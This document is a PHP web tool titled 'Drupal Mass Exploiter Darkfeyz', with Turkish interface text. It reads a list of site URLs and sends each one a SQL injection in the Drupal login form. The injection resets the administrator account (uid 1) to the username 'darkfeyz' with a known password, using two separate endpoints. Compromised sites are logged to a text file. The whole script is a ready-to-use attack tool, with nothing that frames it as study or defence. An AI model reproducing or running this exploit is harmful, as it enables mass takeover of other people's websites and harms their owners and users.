Drupal Mass Exploiter Darkfeyz

1. <?php
2. echo'<form method="POST" action="">
3. <textarea name="urls" cols="50" rows="16" placeholder="http://www.site.com/" ></textarea><br>
4. <input type="submit" name="submit" value="Başlat !">
5. </form>
6. ';
7. $urls = $_POST['urls'];
8. $sites = explode("\r\n",$urls);
9. foreach($sites as $url){
10. $url =trim($url);
11.  
12. $file = fopen("DRUPAL-HACKED.txt", "a");
13. error_reporting(0);
14. if (isset($_POST['submit'])) {
15. //$url = $_POST['url'];
16. $post_data = "name[0;update users set name %3D 'darkfeyz' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
17. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
18. ", 'content' => $post_data));
19. $ctx = stream_context_create($params);
20. $data = file_get_contents($url . '/user/login/', null, $ctx);
21. echo "<h4>Scanning at \"/user/login/</h4>\"";
22. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
23. $fp = fopen("DRUPAL-HACKED.txt", 'a');
24. echo "Basarılı! User:darkfeyz Pass:admin at {$url}/user/login <br>";
25. echo '<font color="#00FF66">Tarama Bitti. Kontrol Edin=> </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
26. echo "<br>---------------------------------------------------------------------------------------<br>";
27. fwrite($fp, "Succes! User:darkfeyz Pass:admin -> {$url}/user/login");
28. fwrite($fp, "
29. ");
30. fwrite($fp, "======================================Darkfeyz==========================================================");
31. fwrite($fp, "
32. ");
33. fclose($fp);
34. } else {
35. echo "Hata! Ya web sitesi savunmasız değil , ya da internet çalışmıyor.";
36. }
37. }
38. if (isset($_POST['submit'])) {
39. //$url = "http://" . $_GET['url'] . "/";
40. $post_data = "name[0;update users set name %3D 'darkfeyz' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
41. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
42. ", 'content' => $post_data));
43. $ctx = stream_context_create($params);
44. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
45. echo "<h4>Scanning at \"Index</h4>\"";
46. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
47. $fp = fopen("DRUPAL-HACKED.txt", 'a');
48. echo "Success! User:darkfeyz Pass:admin at {$url}/user/login <br>";
49. echo '<font color="#00FF66">Tarama Bitti. Kontrol Edin => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
50. echo "<br>======================================================================================<br>";
51. fwrite($fp, "Success! User:darkfeyz Pass:admin -> {$url}/user/login");
52. fwrite($fp, "
53. ");
54. fwrite($fp, "======================================Darkfeyz===========================================================");
55. fwrite($fp, "
56. ");
57. fclose($fp);
58. } else {
59. echo "Hata! Ya web sitesi savunmasız değil , ya da internet çalışmıyor.";
60. echo "<br>======================================================================================<br>";
61. }
62. }
63. //==========
64. }// end foreach
65.  
66.  
67. ?>